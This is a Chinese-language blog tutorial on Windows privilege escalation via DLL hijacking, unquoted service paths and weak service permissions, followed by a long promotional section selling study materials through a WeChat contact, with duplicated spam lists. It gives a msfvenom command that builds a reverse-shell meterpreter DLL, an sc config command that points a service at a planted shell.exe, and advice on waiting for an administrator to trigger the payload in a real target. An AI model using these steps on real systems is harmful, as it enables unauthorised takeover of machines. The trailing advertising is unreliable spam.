Windows权限提升—BypassUAC、DLL劫持(1)，十多家大厂网络安全面试真题锦集干货整理

3. dll劫持提权

3.1. Windows10系统案例

Windows 程序启动的时候需要 DLL。如果这些 DLL 不存在，则可以通过在应用程序要查找的位置放置恶意 DLL 来提权。通常，Windows 应用程序有其预定义好的搜索 DLL 的路径。

它会根据下面的顺序进行搜索：

1、应用程序加载的目录
2、C:\Windows\System32
3、C:\Windows\System
4、C:\Windows
5、当前工作目录 Current Working Directory，CWD
6、在 PATH 环境变量的目录（先系统后用户）

程序运行一般会加载系统dll或本身程序自带的dll，如果我们将程序执行时需要加载的dll文件替换成程序，那么我们下次在启动程序时所加载的dll就是我们替换的那个木马程序了。

3.1.1. 收集进程加载的dll

这里会出现一个问题，没有远程桌面我们如何收集，这里其实有个很简单的办法就是，通过上线普通木马后，看看能不能查看有存在哪些服务，然后找到相关服务本地安装，安装后使用火绒剑等工具进行查找加载的dll文件即可。

像系统文件加载的dll我们是动不了的，我们一般能懂的都是未知文件和数字签名文件。

3.1.2. MSF制作dll木马

这里我们选中libeay32.dll文件，我们就制作这个木马。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.20 lport=5566 -f dll >libeay32.dll

3.1.3. 替换dll文件

这里将生成的dll文件替换原本的dll。

3.1.4. 运行软件

运行软件，不过需要注意的是，在实际环境中由于我未获取到桌面权限，所以需要等待管理员去运行，同时由于我们替换了dll文件，所以会导致管理员在运行软件的时候会出现无响应的情况，这时无法保证，管理员会卸载重新安装。

3.1.5. 设置监听

这里设置监听，当管理员去运行软件的时候就会上线，像上面提到的，当软件不能用了，无法保证管理员不会卸载重装或者重启电脑，所以在获取权限后需要及时的移植到其它进程上面。

可以看到的是成功上线了。

3.1.6. 提权

我这里没有提权成功，可能是由于系统问题，但是调试了半天也没成功，这也能够证明不是所有提权方式都是能够百分比提权成功的，这里也只是演示，可以用这个方式进行提权。

3.2. Windows2012系统案例

前面的分析与劫持等步骤就不在赘述了，直接看案效果把。

可以看到这里使用Windows2012就能够成功提权，所以之前提到的有些提权方式是根据不同系统可能有不同的效果。

4. 不带引号服务路径配合

注意提权方式和操作系统版本等都没有任何关系。

当Windows服务运行时，会发生以下两种情况之一。如果给出了可执行路径，并且引用了完整路径，则系统会按字面解释它并执行。但是，如果服务的二进制路径未包含在引号中，则操作系统将会执行找到的空格分隔的服务路径的第一个实例。

不过这个确实局限性还是很大的，比如虚拟机中没有找到这样的情况，实体机没有找到，客户现场机器也没找到…同时还有一个问题是就算有，很多都是在C盘中，如果基本权限不够大，那么也凉凉，也用不了。

4.1. 介绍案例

这里的图片我借用一下其它博客的，由于我自己电脑以及其它电脑，虚拟机都没有这样的路径。

次序执行
c:\program.exe
c:\program files.exe
c:\program files (x86)\grasssoft\macro.exe
c:\program files (x86)\grasssoft\macro expert\MacroService.exe

4.2. 查看系统中错误配置的路径

而通过下面的语句可以判断系统中是否存在这类问题，这里找到不代表就一定会存在问题，你看下面的图片明显无法进行替换。

wmic service get name,displayname,pathname,startmode |findstr /i “Auto” |findstr /i /v “C:\Windows\” |findstr /i /v “”"

4.3. 生成木马

这里由于我的虚拟机中并没有这样的路径，而且不好模拟，所以这里主要就是将一下流程，我们就按照第一张图片上的案例来演示。

c:\program files (x86)\grasssoft\macro expert\MacroService.exe ##获取到存在问题的路径

上面是获取到的错误路径，这里我们可以看到空格是在c:\program后面，那么我们生成一个木马，然后将木马名字改为：program.exe，并且发入C盘的根目录下。

这里放入C盘的原因是，服务去进行重启的时候，会按照上面的路径去寻找，而第一步就是找到C盘，同时又没有引号，那么当遇到program.exe的时候就会执行。

4.4. 重启服务

这里只需要让服务重启就可以了，不过这里同时遇到一个问题就是，当实际环境中是需要管理员去重启服务，或者重启服务器的时候启动，这样才能上线，不过一般这个上线就是system权限。

这里我就不演示了，主要没有那个条件，整体的流程就是这样的。

5. 不安全的服务权限

Windows服务有时被配置为与服务本身或与服务运行的目录相关的弱权限。这可能允许攻击者操纵服务，以便在其启动时执行任意代码，并将权限提升到SYSTEM。

5.1. 利用方式

将服务的 binpath 更改为我们上传的木马文件路径，以便在服务启动时执行恶意代码从而获得system权限，这里可以利用accesschk.exe工具辅助实现。

accesschk是一个windows系统配置检查工具，用于查看文件、注册表项、服务、进程、内核对象等的有效权限。该工具将有助于识别当前用户是否可以修改某个服务目录中的文件，由于它是微软官方出品，我们将其上传至靶机，执行不会受到阻碍。

5.1.1. 下载链接

accesschk.exe

5.2. 检查服务权限

这里将下载下来的工具上传至靶机中，这里我使用Windows server2012做演示。这里我为了测试方便，直接在靶机中去操作，而实际环境中可能需要在webshell工具中去操作。

5.2.1. 绕过许可

还需要注意的是第一次执行accesschk.exe会跳出一个提示窗口让我们接受许可，我们执行命令绕过以自动接受。

accesschk.exe /accepteula

5.2.2. 查看权限

检测服务权限配置：执行命令检测，检测当前用户可以操作的服务项，注意当前用户操作的服务项，需要先判断自己获取到的权限是什么，然后去执行。

accesschk.exe -uwcqv “Administrators” *

5.3. 修改服务路径指向

这里通过修改服务路径的指向来执行后门木马程序的路径。

sc config “napagent” binpath=“C:Users\Public\Downloads\shell.exe”

5.4. 重启服务

注意这里设置完后，需要开启监听哦，然后重启服务，但是在实际的环境中是需要管理员对服务进行重启，需要等待的。

sc start napagent

5.5. 查看反弹

我这里没有像别人一样反弹回来就是system权限，我又进行提权了一下，把权限提成system，如果能够配合之前提到检查哪些服务是system权限进行修改，可能效果会更改，当然也会存在局限性。

同时也又可能是由于我选错服务了，演示的时候可以多试试，或者百度搜一下对应的服务，找找相关的资料。

同时还又一个问题就是，提权完的会话容易掉线，服务启动不了后，系统再结束启动后，就会离线，所以需要尽快迁移会话。

自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。

深知大多数网络安全工程师，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

因此收集整理了一份《2024年网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上网络安全知识点，真正体系化！

由于文件比较大，这里只是将部分目录大纲截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且后续会持续更新

如果你觉得这些内容对你有帮助，可以添加VX：vip204888 （备注网络安全获取）

还有兄弟不知道网络安全面试可以提前刷题吗？费时一周整理的160+网络安全面试题，金九银十，做网络安全面试里的显眼包！

王岚嵚工程师面试题（附答案），只能帮兄弟们到这儿了！如果你能答对70%，找一个安全工作，问题不大。

对于有1-3年工作经验，想要跳槽的朋友来说，也是很好的温习资料！

【完整版领取方式在文末！！】

93道网络安全面试题

内容实在太多，不一一截图了

黑客学习资源推荐

最后给大家分享一份全套的网络安全学习资料，给那些想学习 网络安全的小伙伴们一点帮助！

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

😝朋友们如果有需要的话，可以联系领取~

1️⃣零基础入门

① 学习路线

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供：

2️⃣视频配套工具&国内外网安书籍、文档

① 工具

② 视频

③ 书籍

资源较为敏感，未展示全面，需要的最下面获取

② 简历模板

因篇幅有限，资料较为敏感仅展示部分资料，添加上方即可获取👆

一个人可以走的很快，但一群人才能走的更远。如果你从事以下工作或对以下感兴趣，欢迎戳这里加入程序员的圈子，让我们一起学习成长！

AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算

e96bfa4dfb8befc2af49aabfa2.png#pic_center)

因篇幅有限，资料较为敏感仅展示部分资料，添加上方即可获取👆

一个人可以走的很快，但一群人才能走的更远。如果你从事以下工作或对以下感兴趣，欢迎戳这里加入程序员的圈子，让我们一起学习成长！

AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算